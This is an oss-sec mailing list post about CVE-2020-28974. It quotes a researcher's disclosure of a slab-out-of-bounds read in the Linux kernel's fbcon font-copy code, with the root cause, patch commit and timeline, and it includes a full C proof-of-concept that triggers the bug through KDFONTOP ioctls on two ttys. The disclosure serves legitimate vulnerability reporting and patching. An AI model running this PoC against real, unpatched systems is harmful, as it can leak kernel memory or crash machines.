oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Linux kernel slab-out-of-bounds Read in fbcon

From: "Srivatsa S. Bhat" <srivatsa () csail mit edu>
Date: Tue, 24 Nov 2020 22:23:24 -0800
On 11/9/20 6:41 AM, Minh Yuan wrote:

Hi,

We recently discovered a slab-out-of-bounds read in fbcon in the latest
kernel ( v5.10-rc2 for now).

The root cause of this vulnerability is that "fbcon_copy_font" did not
handle "vc->vc_font.data" and "vc->vc_font.height" consistently. However,
the patch <https://lkml.org/lkml/2020/9/27/223> for VT_RESIZEX and the patch
<https://lkml.org/lkml/2020/9/24/720> for fbcon_get_font() can't handle
this issue.

This is my PoC (it needs the privilege to access tty to trigger this bug):

// author by ziiiro@THU
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <linux/fb.h>
#include <linux/vt.h>
#include <linux/kd.h>
#include <string.h>

int main(int argc, char** argv)
{
    struct console_font_op op;
    struct consolefontdesc cfdarg;
    void *addr = malloc(0x100);
    memset(addr,'a',0x100);
    int fd1 = open("/dev/tty1", O_RDWR, 0);
    int fd2 = open("/dev/tty6", O_RDWR, 0);
    op.op = KD_FONT_OP_SET;
    op.width = 8;
    op.height = 1;
    op.data = addr;
    op.charcount = 0x100;
    // alloc a samll font.data
    ioctl(fd2,KDFONTOP,&op);
    op.height = 0x20;
    // set a large font.height
    ioctl(fd1, KDFONTOP, &op);
    op.op = KD_FONT_OP_COPY;
    // access tty6's font
    op.height = 5;
    // use a larger height (tty1) to access the small font.data (tty6)
    ioctl(fd1,KDFONTOP,&op);
}

The patch for this bug is available: commit
3c4e0dff2095c579b142d5a0693257f1c58b4804 (
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c4e0dff2095c579b142d5a0693257f1c58b4804
)

Timeline:
* 6/11/20 - Vulnerability reported to security () kernel org and
linux-distros () vs openwall org.
* 9/11/20 - Vulnerability patched.
* 9/11/20 - Vulnerability public.

Regards,

Yuan Ming from Tsinghua University



It looks like CVE-2020-28974 has been assigned for this issue.
https://nvd.nist.gov/vuln/detail/CVE-2020-28974

Regards,
Srivatsa
VMware Photon OS
Previous By Date Next
Previous By Thread Next

Current thread: